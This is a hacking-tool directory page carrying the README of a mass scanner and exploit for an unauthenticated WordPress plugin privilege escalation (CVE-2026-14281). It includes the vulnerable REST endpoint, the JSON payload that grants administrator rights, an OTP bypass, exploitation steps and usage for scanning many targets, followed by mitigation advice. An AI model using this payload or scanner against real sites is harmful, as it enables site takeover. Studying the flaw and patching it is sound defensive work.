Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-14281 — Mass scanner and single-target exploit for CVE-2026-14281, an unauthenticated privilege escalation in the WordPress Automation Web Platform plugin via REST signup. | Kitploit
Tools/GitHubGitHub/langz337/cve-2026-14281
Privilege EscalationReconnaissanceVulnerability ScannersPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHublangz337/cve-2026-14281

CVE-2026-14281

Mass scanner and single-target exploit for CVE-2026-14281, an unauthenticated privilege escalation in the WordPress Automation Web Platform plugin via REST signup.

117 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository

LANGZ Scanner + Exploit

Mass scanner + single-target Exploit for CVE-2026-14281 — an unauthenticated privilege escalation in the WordPress Automation Web Platform (WAWP) plugin <= 4.8.6.


What is CVE-2026-14281?

Improper Privilege Management (CWE-269) in the WordPress plugin Automation Web Platform (by 101gen). Versions <= 4.8.6 are affected.

FieldValue
CVECVE-2026-14281
TypeUnauthenticated Privilege Escalation
CVSS9.8 (CRITICAL)
AuthNone required
AffectedWAWP plugin <= 4.8.6

Root Cause

The plugin exposes a public REST route:

POST /wp-json/wawp/v1/signup/<op>

No permission check. The handler copies attacker-controlled wawp_custom_fields into update_user_meta() — no allowlist. Attacker sets:

{
  "wawp_custom_fields": {
    "wp_capabilities": {"administrator": true},
    "wp_user_level": "10"
  }
}

Result: the new account gets administrator role.

Bonus: OTP Bypass

The OTP token (otp_transient) is returned in plaintext in the response body. A GET request with that token marks it verified — no email/SMS needed.


Impact

  • Full admin access to WordPress
  • Install / remove plugins & themes
  • Manage users, modify content
  • Potential RCE via admin editors

Exploitation Flow

  1. POST payload to /wp-json/wawp/v1/signup/ with wp_capabilities: administrator
  2. Bypass OTP using the plaintext token from the response
  3. Login at /wp-login.php with the new credentials
  4. Confirm by accessing /wp-admin/users.php

Requirements

  • Python 3.7+
  • requests, urllib3

Installation

git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3

Usage

python3 CVE-2026-14281.py
[1] Mass Scan        -> detect many targets, save vuln to txt
[2] Verify Single    -> exploit + confirm + auto cleanup
[0] Exit

Mass Scan: input target list file, output file (default vuln.txt), thread count (default 20).

Verify Single: type YA, enter target URL. Tool creates a temp admin, verifies, then cleans up.


Output

vuln.txt contains only confirmed vulnerable URLs, one per line:

http://target1.com
https://target2.org

Mitigation

  1. Update the plugin past 4.8.6
  2. If no patch: disable plugin or block /wp-json/wawp/v1/signup/
  3. Audit for rogue admin accounts
  4. Rotate credentials if compromised

Disclaimer

For AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.

Use it wisely. Knowledge is meant to protect, not to destroy.

CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2026-14281

Download Tool